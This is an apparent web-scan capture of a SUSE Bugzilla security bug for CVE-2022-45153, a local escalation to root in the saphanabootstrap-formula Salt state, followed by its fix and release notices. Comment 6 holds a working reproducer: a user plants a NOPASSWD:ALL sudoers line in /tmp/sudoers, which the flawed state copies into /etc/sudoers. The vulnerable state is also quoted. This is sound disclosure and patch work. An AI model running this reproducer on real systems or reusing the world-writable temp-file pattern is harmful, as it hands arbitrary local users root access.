bugzilla.suse.com
Open in
urlscan Pro
195.135.220.27
Public Scan
URL:
https://bugzilla.suse.com/show_bug.cgi?id=1205990
Submission: On February 27 via api from US — Scanned from DE
Submission: On February 27 via api from US — Scanned from DE
Form analysis 6 forms found in the DOM
GET buglist.cgi
<form action="buglist.cgi" method="get" onsubmit="if (this.quicksearch.value == '')
{ alert('Please enter one or more search terms first.');
return false; } return true;">
<input type="hidden" id="no_redirect_top" name="no_redirect" value="1">
<script type="text/javascript">
if (history && history.replaceState) {
var no_redirect = document.getElementById("no_redirect_top");
no_redirect.value = 1;
}
</script>
<input class="txt" type="text" id="quicksearch_top" name="quicksearch" title="Quick Search" value="">
<input class="btn" type="submit" value="Search" id="find_top">
</form>POST show_bug.cgi?id=1205990
<form action="show_bug.cgi?id=1205990" method="POST" class="mini_login bz_default_hidden" id="mini_login_top" onsubmit="return check_mini_login_fields( '_top' );">
<input id="Bugzilla_login_top" class="bz_login bz_mini_login_help" name="Bugzilla_login" title="Login" onfocus="mini_login_on_focus('_top')">
<input class="bz_password bz_default_hidden" id="Bugzilla_password_top" name="Bugzilla_password" type="password" title="Password">
<input class="bz_password bz_mini_login_help" type="text" id="Bugzilla_password_dummy_top" value="password" title="Password" onfocus="mini_login_on_focus('_top')">
<input type="submit" name="GoAheadAndLogIn" value="Log in" id="log_in_top">
<script type="text/javascript">
mini_login_constants = {
"login": "login",
"warning": "You must set the login and password before logging in."
};
if (YAHOO.env.ua.gecko || YAHOO.env.ua.ie || YAHOO.env.ua.opera) {
YAHOO.util.Event.onDOMReady(function() {
init_mini_login_form('_top');
});
} else {
YAHOO.util.Event.on(window, 'load', function() {
window.setTimeout(function() {
init_mini_login_form('_top');
}, 200);
});
}
</script>
<a href="#" onclick="return hide_mini_login_form('_top')">[x]</a>
</form>Name: changeform — POST process_bug.cgi
<form name="changeform" id="changeform" method="post" action="process_bug.cgi">
<input type="hidden" name="delta_ts" value="2023-02-07 10:01:26">
<input type="hidden" name="longdesclength" value="17">
<input type="hidden" name="id" value="1205990">
<input type="hidden" name="token" value="1677513704-MPshWsHf793lx8AhmC2sdY28EjGyeOqXMVTCV8Jy1XQ">
<div class="bz_alias_short_desc_container edit_form">
<a href="show_bug.cgi?id=1205990"><b>Bug 1205990</b></a> -<span id="summary_alias_container"> (<span id="alias_nonedit_display">CVE-2022-45153</span>) <span id="short_desc_nonedit_display">VUL-0: CVE-2022-45153: saphanabootstrap-formula:
Escalation to root for arbitrary users in hana/ha_cluster.sls</span>
</span>
<div id="summary_alias_input" class="bz_default_hidden">
<table id="summary">
<tbody>
<tr>
<td colspan="2">(CVE-2022-45153) </td>
</tr>
<tr>
<th class="field_label " id="field_label_short_desc">
<label for="short_desc" accesskey="s">
<a title="The bug summary is a short sentence which succinctly describes what the bug is about." class="field_help_link" href="page.cgi?id=glossary.html#short_desc">Summary:</a>
</label>
</th>
<td><span title="VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbitrary users in hana/ha_cluster.sls">VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbit... </span>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<script type="text/javascript">
hideAliasAndSummary('VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbitrary users in hana\/ha_cluster.sls', 'CVE-2022-45153');
</script>
<table class="edit_form">
<tbody>
<tr>
<td id="bz_show_bug_column_1" class="bz_show_bug_column">
<table>
<tbody>
<tr>
<th class="field_label">
<a href="page.cgi?id=status_resolution_matrix.html">Status</a>:
</th>
<td id="bz_field_status">
<span id="static_bug_status">NEW </span>
</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_classification">
<a title="Bugs are categorised into Classifications, Products and Components. classifications is the top-level categorisation." class="field_help_link" href="page.cgi?id=glossary.html#classification">Classification:</a>
</th>
<td class="field_value " id="field_container_classification">Novell Products</td>
</tr>
<tr>
<th class="field_label " id="field_label_product">
<a title="Bugs are categorised into Products and Components. Select a Classification to narrow down this list." class="field_help_link" href="describecomponents.cgi">Product:</a>
</th>
<td class="field_value " id="field_container_product">SUSE Security Incidents</td>
</tr>
<tr class="bz_default_hidden">
<th class="field_label " id="field_label_classification">
<a title="Bugs are categorised into Classifications, Products and Components. classifications is the top-level categorisation." class="field_help_link" href="page.cgi?id=glossary.html#classification">Classification:</a>
</th>
<td class="field_value " id="field_container_classification">Novell Products</td>
</tr>
<tr>
<th class="field_label " id="field_label_component">
<a title="Components are second-level categories; each belongs to a particular Product. Select a Product to narrow down this list." class="field_help_link" href="describecomponents.cgi?product=SUSE Security Incidents">Component:</a>
</th>
<td class="field_value " id="field_container_component">Incidents</td>
</tr>
<tr>
<th class="field_label " id="field_label_version">
<label for="version">
<a title="The version field defines the version of the software the bug was found in." class="field_help_link" href="page.cgi?id=glossary.html#version">Version:</a>
</label>
</th>
<td>unspecified </td>
</tr>
<tr>
<th class="field_label " id="field_label_rep_platform">
<label for="rep_platform" accesskey="h">
<a title="The hardware platform the bug was observed on. Note: When searching, selecting the option "All" only finds bugs whose value for this field is literally the word "All"." class="field_help_link" href="page.cgi?id=glossary.html#rep_platform">Hardware:</a>
</label>
</th>
<td class="field_value">Other Other </td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label">
<label for="priority">
<a href="page.cgi?id=glossary.html#priority">Priority</a></label>:
</th>
<td>P3 - Medium <label for="severity">
<b>Severity</b></label>: Normal </td>
</tr>
<tr>
<th class="field_label">
<label for="target_milestone">
<a href="page.cgi?id=glossary.html#target_milestone">
Target Milestone</a></label>:
</th>
<td>--- </td>
</tr>
<tr>
<th class="field_label">
<a href="page.cgi?id=glossary.html#assigned_to">Assigned To</a>:
</th>
<td><span class="vcard"><span class="fn">Shapbot Shapbotson</span>
</span>
</td>
</tr>
<tr>
<th class="field_label " id="field_label_qa_contact">
<label for="qa_contact" accesskey="q">
<a title="The person responsible for confirming this bug if it is unconfirmed, and for verifying the fix once the bug has been resolved." class="field_help_link" href="page.cgi?id=glossary.html#qa_contact">QA Contact:</a>
</label>
</th>
<td><span class="vcard"><span class="fn">Security Team bot</span>
</span>
</td>
</tr>
<script type="text/javascript">
assignToDefaultOnChange(['product', 'component'], 'security-team\x40suse.de', 'security-team\x40suse.de');
</script>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_bug_file_loc">
<label for="bug_file_loc" accesskey="u">
<a title="Bugs can have a URL associated with them - for example, a pointer to a web site where the problem is seen." class="field_help_link" href="page.cgi?id=glossary.html#bug_file_loc">URL:</a>
</label>
</th>
<td>
<span id="bz_url_input_area">
<a href="https://smash.suse.de/issue/349334/">https://smash.suse.de/issue/349334/</a>
</span>
</td>
</tr>
<tr>
<th class="field_label " id="field_label_status_whiteboard">
<label for="status_whiteboard" accesskey="w">
<a title="Each bug has a free-form single line text entry box for adding tags and status information." class="field_help_link" href="page.cgi?id=glossary.html#status_whiteboard">Whiteboard:</a>
</label>
</th>
<td colspan="2">
<span title="CVSSv3.1:SUSE:CVE-2022-45153:7.8:(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)">CVSSv3.1:SUSE:CVE-2022-45153:7.8:(AV:... </span>
</td>
</tr>
<tr>
<th class="field_label">
<label for="keywords" accesskey="k">
<a href="describekeywords.cgi"><u>K</u>eywords</a></label>:
</th>
<td class="field_value" colspan="2">
</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_dependson">
<a title="The bugs listed here must be resolved before this bug can be resolved." class="field_help_link" href="page.cgi?id=glossary.html#dependson">Depends on:</a>
</th>
<td>
<span id="dependson_input_area">
</span>
</td>
</tr>
<tr>
<th class="field_label " id="field_label_blocked">
<a title="This bug must be resolved before the bugs listed in this field can be resolved." class="field_help_link" href="page.cgi?id=glossary.html#blocked">Blocks:</a>
</th>
<td>
<span id="blocked_input_area">
</span>
</td>
</tr>
<tr>
<th> </th>
<td colspan="2" align="left" id="show_dependency_tree_or_graph"> Show dependency <a href="showdependencytree.cgi?id=1205990&hide_resolved=1">tree</a> / <a href="showdependencygraph.cgi?id=1205990">graph</a>
</td>
</tr>
</tbody>
</table>
</td>
<td>
<div class="bz_column_spacer"> </div>
</td>
<td id="bz_show_bug_column_2" class="bz_show_bug_column">
<ul>
<li><a href="tr_new_case.cgi?product=SUSE%20Security%20Incidents&bug=1205990">Create test case</a></li>
</ul>
<ul>
<li><a href="enter_bug.cgi?cloned_bug_id=1205990">Clone This Bug</a></li>
</ul>
<table cellpadding="3" cellspacing="1">
<tbody>
<tr>
<th class="field_label"> Reported: </th>
<td>2022-12-02 15:00 UTC by <span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</td>
</tr>
<tr>
<th class="field_label"> Modified: </th>
<td>2023-02-07 10:01 UTC (<a href="show_activity.cgi?id=1205990">History</a>) </td>
</tr>
<tr>
<th class="field_label">
<label for="newcc" accesskey="a">CC List:</label>
</th>
<td>3 users <span id="cc_edit_area_showhide_container"> (<a href="#" id="cc_edit_area_showhide">show</a>) </span>
<div id="cc_edit_area" class="bz_default_hidden">
<br>
<select id="cc" multiple="multiple" size="5">
<option value="jsegitz">jsegitz</option>
<option value="rfrohl">rfrohl</option>
<option value="steven.stringer">steven.stringer</option>
</select>
</div>
<script type="text/javascript">
hideEditableField('cc_edit_area_showhide_container', 'cc_edit_area', 'cc_edit_area_showhide', '', '');
</script>
</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_see_also">
<a title="This allows you to refer to bugs in other installations. You can enter a URL to a bug in the 'Add Bug URLs' field to note that that bug is related to this one. You can enter multiple URLs at once by separating them with a comma. You should normally use this field to refer to bugs in other installations. For bugs in this installation, it is better to use the Depends on and Blocks fields." class="field_help_link" href="page.cgi?id=glossary.html#see_also">See Also:</a>
</th>
<td class="field_value " id="field_container_see_also"></td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_foundby">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_foundby">Found By:</a>
</th>
<td class="field_value " id="field_container_cf_foundby" colspan="2">---</td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_nts_priority">
<a title="A custom Free Text field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_nts_priority">Services Priority:</a>
</th>
<td class="field_value " id="field_container_cf_nts_priority" colspan="2"></td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_biz_priority">
<a title="A custom Free Text field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_biz_priority">Business Priority:</a>
</th>
<td class="field_value " id="field_container_cf_biz_priority" colspan="2"></td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_blocker">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_blocker">Blocker:</a>
</th>
<td class="field_value " id="field_container_cf_blocker" colspan="2">---</td>
</tr>
<tr>
<th class="field_label bz_hidden_field" id="field_label_cf_marketing_qa_status">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_marketing_qa_status">Marketing QA Status:</a>
</th>
<td class="field_value bz_hidden_field" id="field_container_cf_marketing_qa_status" colspan="2">---</td>
</tr>
<tr>
<th class="field_label bz_hidden_field" id="field_label_cf_it_deployment">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_it_deployment">IT Deployment:</a>
</th>
<td class="field_value bz_hidden_field" id="field_container_cf_it_deployment" colspan="2">---</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td colspan="3">
<hr id="bz_top_half_spacer">
</td>
</tr>
</tbody>
</table>
<table id="bz_big_form_parts" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td>
<script type="text/javascript">
<!--
function toggle_display(link) {
var table = document.getElementById("attachment_table");
var view_all = document.getElementById("view_all");
var hide_obsolete_url_parameter = "&hide_obsolete=1";
// Store current height for scrolling later
var originalHeight = table.offsetHeight;
var rows = YAHOO.util.Dom.getElementsByClassName('bz_tr_obsolete', 'tr', table);
for (var i = 0; i < rows.length; i++) {
bz_toggleClass(rows[i], 'bz_default_hidden');
}
if (YAHOO.util.Dom.hasClass(rows[0], 'bz_default_hidden')) {
link.innerHTML = "Show Obsolete";
view_all.href = view_all.href + hide_obsolete_url_parameter
} else {
link.innerHTML = "Hide Obsolete";
view_all.href = view_all.href.replace(hide_obsolete_url_parameter, "");
}
var newHeight = table.offsetHeight;
// This scrolling makes the window appear to not move at all.
window.scrollBy(0, newHeight - originalHeight);
return false;
}
//
-->
</script>
<br>
<table id="attachment_table" cellspacing="0" cellpadding="4">
<tbody>
<tr id="a0">
<th colspan="2" align="left"> Attachments </th>
</tr>
<tr class="bz_attach_footer">
<td colspan="2">
<a href="attachment.cgi?bugid=1205990&action=enter">Add an attachment</a> (proposed patch, testcase, etc.)
</td>
</tr>
</tbody>
</table>
<br>
<div id="add_comment" class="bz_section_additional_comments">
<table>
<tbody>
<tr>
<td>
<fieldset>
<legend>Note</legend> You need to <a href="show_bug.cgi?id=1205990&GoAheadAndLogIn=1">log in</a> before you can comment on or make changes to this bug.
</fieldset>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td>
</td>
</tr>
</tbody>
</table>
<div id="comments">
<script src="js/comments.js?1411227336" type="text/javascript">
</script>
<script type="text/javascript">
<!--
/* Adds the reply text to the `comment' textarea */
function replyToComment(id, real_id, name) {
var prefix = "(In reply to " + name + " from comment #" + id + ")\n";
var replytext = "";
/* pre id="comment_name_N" */
var text_elem = document.getElementById('comment_text_' + id);
var text = getText(text_elem);
replytext = prefix + wrapReplyText(text);
/* <textarea id="comment"> */
var textarea = document.getElementById('comment');
if (textarea.value != replytext) {
textarea.value += replytext;
}
textarea.focus();
}
//
-->
</script>
<!-- This auto-sizes the comments and positions the collapse/expand links
to the right. -->
<table class="bz_comment_table" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td>
<div id="c0" class="bz_comment bz_first_comment">
<div class="bz_first_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c0">Description</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-02 15:00:41 UTC </span>
</div>
<pre class="bz_comment_text">Problematic code in hana/ha_cluster.sls
48 # Update /etc/sudoers to allow crm operations to the sidadm
49 {% set tmp_sudoers = '/tmp/sudoers' %}
50 {% set sudoers = '/etc/sudoers' %}
51
52 sudoers_backup_{{ sap_instance }}:
53 file.copy:
54 - name: {{ tmp_sudoers }}
55 - source: {{ sudoers }}
56 - unless: cat {{ sudoers }} | grep {{ node.sid.lower() }}adm
57 - require:
58 - stop_hana_{{ sap_instance }}
59
60 sudoers_append_{{ sap_instance }}:
61 file.append:
62 - name: {{ tmp_sudoers }}
63 - text: |
64 {{ node.sid.lower() }}adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana_{{ node.sid.lower() }}_site_srHook_*
65 - require:
66 - sudoers_backup_{{ sap_instance }}
67
68 sudoers_check_{{ sap_instance }}:
69 cmd.run:
70 - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
71 - require:
72 - sudoers_append_{{ sap_instance }}
73
74 sudoers_edit_{{ sap_instance }}:
75 file.copy:
76 - name: {{ sudoers }}
77 - source: {{ tmp_sudoers }}
78 - force: true
79 - require:
80 - sudoers_check_{{ sap_instance }}
81 - stop_hana_{{ sap_instance }}
/tmp/sudoers can be written by arbitrary users. According to
<a href="https://docs.saltproject.io/en/latest/ref/states/all/salt.states.file.html#salt.states.file.copy">https://docs.saltproject.io/en/latest/ref/states/all/salt.states.file.html#salt.states.file.copy</a>
it will not overwrite existing files. I need to reproduce it (don't have a working salt setup ATM), but every user should be able to write a arbitrary sudoers, place it there and then this will copy it into /etc
CVE assignment and reproducer next week</pre>
</div>
<div id="c3" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c3">Comment 3</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 10:11:15 UTC </span>
</div>
<pre class="bz_comment_text">This issue has already been corrected and is currently awaiting release
SUSE:SLE-12-SP3:Update = IBS request 283896
SUSE:SLE-15:Update = IBS request 283894
SUSE:SLE-15-SP2:Update = IBS request 283895</pre>
</div>
<div id="c4" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c4">Comment 4</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:21:52 UTC </span>
</div>
<pre class="bz_comment_text">Thanks, but please wait with this. This needs a CVE. I'm just reproducing it and then I'll assign a CVE</pre>
</div>
<div id="c5" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c5">Comment 5</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:25:08 UTC </span>
</div>
<pre class="bz_comment_text">Please use CVE-2022-45153</pre>
</div>
<div id="c6" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c6">Comment 6</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:28:01 UTC </span>
</div>
<pre class="bz_comment_text">Reproducer:
Create stripped down sls file at /usr/share/salt-formulas/states/ha_cluster_exploit.sls
{% set tmp_sudoers = '/tmp/sudoers' %}
{% set sudoers = '/etc/sudoers' %}
sudoers_backup:
file.copy:
- name: {{ tmp_sudoers }}
- source: {{ sudoers }}
- unless: cat {{ sudoers }} | grep adm
sudoers_append:
file.append:
- name: {{ tmp_sudoers }}
- text: |
adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana__site_srHook_*
- require:
- sudoers_backup
sudoers_check:
cmd.run:
- name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
- require:
- sudoers_append
sudoers_edit:
file.copy:
- name: {{ sudoers }}
- source: {{ tmp_sudoers }}
- force: true
- require:
- sudoers_check
as user run (change username)
echo 'johannes ALL=(ALL) NOPASSWD:ALL' > /tmp/sudoers
as root:
salt-call --local state.apply ha_cluster_exploit
then as user:
sudo su
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)</pre>
</div>
<div id="c7" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c7">Comment 7</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:29:27 UTC </span>
</div>
<pre class="bz_comment_text">can't be exploited by the user when this ran once as /tmp/sudoers stays and the users can't overwrite it.</pre>
</div>
<div id="c8" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c8">Comment 8</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 13:51:41 UTC </span>
</div>
<pre class="bz_comment_text">(In reply to Johannes Segitz from <a href="show_bug.cgi?id=1205990#c5">comment #5</a>)
<span class="quote">> Please use CVE-2022-45153</span>
Use CVE for what?</pre>
</div>
<div id="c9" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c9">Comment 9</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 16:07:40 UTC </span>
</div>
<pre class="bz_comment_text">For the changelog and for tracking this vulnerability internally and externally</pre>
</div>
<div id="c10" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c10">Comment 10</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-15 08:17:18 UTC </span>
</div>
<pre class="bz_comment_text">Here's the new code. A tmp file is no longer used and /etc/sudoers is no longer touched. A new file is created (/etc/sudoers.d/SAPHanaSR). To ensure that the new file doesn't break the sudoers config the command `/usr/sbin/visudo -c -f` is run.
```
sudoers_create_{{ sap_instance }}:
file.managed:
- source: salt://hana/templates/ha_cluster_sudoers.j2
- name: {{ sudoers }}
- template: jinja
- user: root
- group: root
- mode: 0440
- check_cmd: /usr/sbin/visudo -c -f
- require:
- pkg: install_SAPHanaSR
- context:
sid: {{ node.sid }}
sites: {{ sites }}
sr_hook: {{ sr_hook }}
sr_hook_multi_target: {{ sr_hook_multi_target }}
sr_hook_string: __slot__:salt:file.grep({{ sr_hook }}, "^srHookGen = ").stdout
sustkover_hook: {{ sustkover_hook }}
```
Full file here -> <a href="https://github.com/SUSE/saphanabootstrap-formula/blob/main/hana/ha_cluster.sls">https://github.com/SUSE/saphanabootstrap-formula/blob/main/hana/ha_cluster.sls</a></pre>
</div>
<div id="c11" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c11">Comment 11</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-15 09:12:10 UTC </span>
</div>
<pre class="bz_comment_text">looks good, thank you</pre>
</div>
<div id="c12" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c12">Comment 12</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-15 12:08:41 UTC </span>
</div>
<pre class="bz_comment_text">For your reference, I've added the CVE to the changelog and resubmitted the requests into ISB. Here are the request IDs.
SUSE:SLE-12-SP3:Update 286480
SUSE:SLE-15:Update 286481
SUSE:SLE-15-SP2:Update 286479</pre>
</div>
<div id="c14" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c14">Comment 14</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Swamp Workflow Management</span>
</span>
</span>
<span class="bz_comment_time"> 2023-01-02 14:24:43 UTC </span>
</div>
<pre class="bz_comment_text">SUSE-SU-2023:0011-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.</pre>
</div>
<div id="c15" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c15">Comment 15</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Swamp Workflow Management</span>
</span>
</span>
<span class="bz_comment_time"> 2023-01-02 14:25:26 UTC </span>
</div>
<pre class="bz_comment_text">SUSE-SU-2023:0010-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Module for SAP Applications 15-SP1 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150000.1.19.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.</pre>
</div>
<div id="c16" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c16">Comment 16</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Swamp Workflow Management</span>
</span>
</span>
<span class="bz_comment_time"> 2023-01-02 14:30:39 UTC </span>
</div>
<pre class="bz_comment_text">SUSE-SU-2023:0009-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
openSUSE Leap 15.4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
openSUSE Leap 15.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.</pre>
</div>
</td>
<td>
</td>
</tr>
</tbody>
</table>
</div>
</form>GET buglist.cgi
<form action="buglist.cgi" method="get" onsubmit="if (this.quicksearch.value == '')
{ alert('Please enter one or more search terms first.');
return false; } return true;">
<input type="hidden" id="no_redirect_bottom" name="no_redirect" value="1">
<script type="text/javascript">
if (history && history.replaceState) {
var no_redirect = document.getElementById("no_redirect_bottom");
no_redirect.value = 1;
}
</script>
<input class="txt" type="text" id="quicksearch_bottom" name="quicksearch" title="Quick Search" value="">
<input class="btn" type="submit" value="Search" id="find_bottom">
</form>POST show_bug.cgi?id=1205990
<form action="show_bug.cgi?id=1205990" method="POST" class="mini_login bz_default_hidden" id="mini_login_bottom" onsubmit="return check_mini_login_fields( '_bottom' );">
<input id="Bugzilla_login_bottom" class="bz_login bz_mini_login_help" name="Bugzilla_login" title="Login" onfocus="mini_login_on_focus('_bottom')">
<input class="bz_password bz_default_hidden" id="Bugzilla_password_bottom" name="Bugzilla_password" type="password" title="Password">
<input class="bz_password bz_mini_login_help" type="text" id="Bugzilla_password_dummy_bottom" value="password" title="Password" onfocus="mini_login_on_focus('_bottom')">
<input type="submit" name="GoAheadAndLogIn" value="Log in" id="log_in_bottom">
<script type="text/javascript">
mini_login_constants = {
"login": "login",
"warning": "You must set the login and password before logging in."
};
if (YAHOO.env.ua.gecko || YAHOO.env.ua.ie || YAHOO.env.ua.opera) {
YAHOO.util.Event.onDOMReady(function() {
init_mini_login_form('_bottom');
});
} else {
YAHOO.util.Event.on(window, 'load', function() {
window.setTimeout(function() {
init_mini_login_form('_bottom');
}, 200);
});
}
</script>
<a href="#" onclick="return hide_mini_login_form('_bottom')">[x]</a>
</form><form id="testopia_helper_frm"></form>Text Content
Bugzilla – Bug 1205990
VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for
arbitrary users in hana/ha_cluster.sls
Last modified: 2023-02-07 10:01:26 UTC
* Home
* | New
* | Browse
* | Search
* |
[?]
* | Reports
* | Requests
* | Help
* | Log In
[x]
* | Forgot Password
First Last Prev Next This bug is not in your last search results.
Bug 1205990 - (CVE-2022-45153) VUL-0: CVE-2022-45153: saphanabootstrap-formula:
Escalation to root for arbitrary users in hana/ha_cluster.sls
(CVE-2022-45153) Summary: VUL-0: CVE-2022-45153: saphanabootstrap-formula:
Escalation to root for arbit...
Status: NEW Classification: Novell Products Product: SUSE Security Incidents
Classification: Novell Products Component: Incidents Version: unspecified
Hardware: Other Other Priority: P3 - Medium Severity: Normal Target Milestone:
--- Assigned To: Shapbot Shapbotson QA Contact: Security Team bot URL:
https://smash.suse.de/issue/349334/ Whiteboard:
CVSSv3.1:SUSE:CVE-2022-45153:7.8:(AV:... Keywords: Depends on: Blocks: Show
dependency tree / graph
* Create test case
* Clone This Bug
Reported: 2022-12-02 15:00 UTC by Johannes Segitz Modified: 2023-02-07 10:01 UTC
(History) CC List: 3 users (show)
jsegitz rfrohl steven.stringer
See Also: Found By: --- Services Priority: Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
--------------------------------------------------------------------------------
Attachments Add an attachment (proposed patch, testcase, etc.)
Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2022-12-02 15:00:41 UTC
Problematic code in hana/ha_cluster.sls
48 # Update /etc/sudoers to allow crm operations to the sidadm
49 {% set tmp_sudoers = '/tmp/sudoers' %}
50 {% set sudoers = '/etc/sudoers' %}
51
52 sudoers_backup_{{ sap_instance }}:
53 file.copy:
54 - name: {{ tmp_sudoers }}
55 - source: {{ sudoers }}
56 - unless: cat {{ sudoers }} | grep {{ node.sid.lower() }}adm
57 - require:
58 - stop_hana_{{ sap_instance }}
59
60 sudoers_append_{{ sap_instance }}:
61 file.append:
62 - name: {{ tmp_sudoers }}
63 - text: |
64 {{ node.sid.lower() }}adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana_{{ node.sid.lower() }}_site_srHook_*
65 - require:
